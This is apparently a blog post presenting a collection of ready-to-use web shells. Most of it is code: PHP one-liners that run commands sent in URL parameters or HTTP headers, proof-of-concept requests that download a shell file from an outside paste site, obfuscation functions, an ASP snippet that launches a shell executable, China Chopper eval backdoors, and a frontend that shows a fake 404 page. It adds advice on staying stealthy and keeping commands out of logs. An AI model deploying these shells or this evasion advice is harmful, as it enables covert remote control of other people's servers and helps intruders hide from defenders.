Post

Encrypted Backdoor Secret Shell

Posted Updated
By
2 min read

A webshell is a shell that you can access through the web. This is useful for when you have firewalls that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to function, you can't filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports since the traffic is hidden in the http traffic.

Caution: I found it appropriate to share it without encryption to show that there is no log hidden in the codes. But I recommend Encrypt.

An example: China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server.

<PHP:
#Execute one command
<?php system("ls -a"); ?>
<?php system("whoami"); ?>

#Take input from the url paramter. run as any shell commands.
<?php system($_GET['cmd']);?>

#The same but using passthru
<?php passthru($_GET['cmd']); ?>

#For shell_exec to output the result you need to echo it
<?php echo shell_exec("whoami");?>

#Exec() does not output the result without echo, and only output the last line. So not very useful!
<?php echo exec("whoami");?>

#Instead to this if you can. It will return the output as an array, and then print it all.
<?php exec("ls -la",$array); print_r($array); ?>

#preg_replace(). This is a cool trick
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

#Using backticks
<?php echo `whoami`; ?>

POC:
http://192.168.1.103/fox.php?cmd=pwd
/index.php?cmd=wget https://pasteio.com/raw/bl8okgdd fox.php
/index.php?cmd=curl https://pasteio.com/raw/lkjfjfd > fox.php 
/index.php?cmd=GET https://pasteio.com/raw/erg44j fox.php


Make it stealthy:
# We can make the commands from above a bit more stealthy. Instead of passing the cmds through the url, which will be obvious in logs, we cna pass them through other header-paramters.

<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
<?php system($_SERVER['HTTP_USER_AGENT'])?>

# I have had to use this one
<?php echo passthru($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>

Obfuscation:
eval(): A function that evaluates a given string as PHP code
assert(): A function that evaluates a given string as PHP code
base64(): Encodes data with MIME base64 encoding
gzdeflate(): Compresses a string using DEFLATE data format; gzinflate() decompresses it
str_rot13(): Shifts every letter of a given string 13 places in the alphabet

<ASP:
<%
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True)
%>

China Chopper:
PHP: <?php @eval($_POST[‘password’]);?>
ASPX: <%@ Page Language=”Jscript”%><%eval(RequestItem[“password”],”unsafe”);%>

2 Basic PHP WebShell Frontend:

#1
<?php
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    system($cmd);
} else {
    echo "404 - Page Not Found";
}
?>

#2
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="60">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Copyright 2017 WhiteWinterWolf Shell Source Code

https://github.com/faruk-guler/Shell
Hacking - Security
This post is licensed under CC BY 4.0 by the author.